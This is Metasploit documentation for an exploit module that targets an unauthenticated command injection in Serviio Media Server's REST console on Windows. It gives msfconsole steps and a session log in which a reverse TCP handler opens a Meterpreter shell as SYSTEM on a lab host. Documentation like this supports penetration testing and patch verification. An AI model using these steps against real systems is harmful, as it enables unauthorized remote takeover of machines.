metasploit-gs/documentation/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec.md

Description

This module exploits an unauthenticated remote command execution vulnerability in the console component of Serviio Media Server versions 1.4 to 1.8 on Windows operating systems.

The console service (on port 23423 by default) exposes a REST API which which does not require authentication.

The 'action' API endpoint does not sufficiently sanitize user-supplied data in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is used in a call to cmd.exe resulting in execution of arbitrary commands.

Vulnerable Application

Serviio is a free media server. It allows you to stream your media files (music, video or images) to renderer devices (e.g. a TV set, Bluray player, games console or mobile phone) on your connected home network.

Serviio is based on Java technology and therefore runs on most platforms, including Windows, Mac and Linux (incl. embedded systems, e.g. NAS).

This module has been tested successfully on Serviio Media Server versions 1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.

Installers:

• serviio-1.8-win-setup.exe
• serviio-1.7-win-setup.exe
• serviio-1.6-win-setup.exe
• serviio-1.5-win-setup.exe
• serviio-1.4-win-setup.exe

Verification Steps

1. Start msfconsole
2. Do: use exploit/windows/http/serviio_checkstreamurl_cmd_exec
3. Do: set rhost [IP]
4. Do: run
5. You should get a session

Scenarios

msf > use exploit/windows/http/serviio_checkstreamurl_cmd_exec 
msf exploit(serviio_checkstreamurl_cmd_exec) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(serviio_checkstreamurl_cmd_exec) > check
[*] 172.16.191.166:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > set verbose true
verbose => true
msf exploit(serviio_checkstreamurl_cmd_exec) > check

[*] 172.16.191.166:23423 Serviio Media Server version 1.8
[*] 172.16.191.166:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > run

[*] Started reverse TCP handler on 172.16.191.181:4444 
[*] Serviio Media Server version 1.8
[*] Command Stager progress -   7.95% done (7999/100636 bytes)
[*] Command Stager progress -  15.90% done (15998/100636 bytes)
[*] Command Stager progress -  23.85% done (23997/100636 bytes)
[*] Command Stager progress -  31.79% done (31996/100636 bytes)
[*] Command Stager progress -  39.74% done (39995/100636 bytes)
[*] Command Stager progress -  47.69% done (47994/100636 bytes)
[*] Command Stager progress -  55.64% done (55993/100636 bytes)
[*] Command Stager progress -  63.59% done (63992/100636 bytes)
[*] Command Stager progress -  71.54% done (71991/100636 bytes)
[*] Command Stager progress -  79.48% done (79990/100636 bytes)
[*] Command Stager progress -  87.43% done (87989/100636 bytes)
[*] Command Stager progress -  95.38% done (95988/100636 bytes)
[*] Sending stage (957487 bytes) to 172.16.191.166
[*] Command Stager progress - 100.00% done (100636/100636 bytes)
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.166:58474) at 2017-05-05 02:49:39 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd 
C:\Program Files\Serviio\bin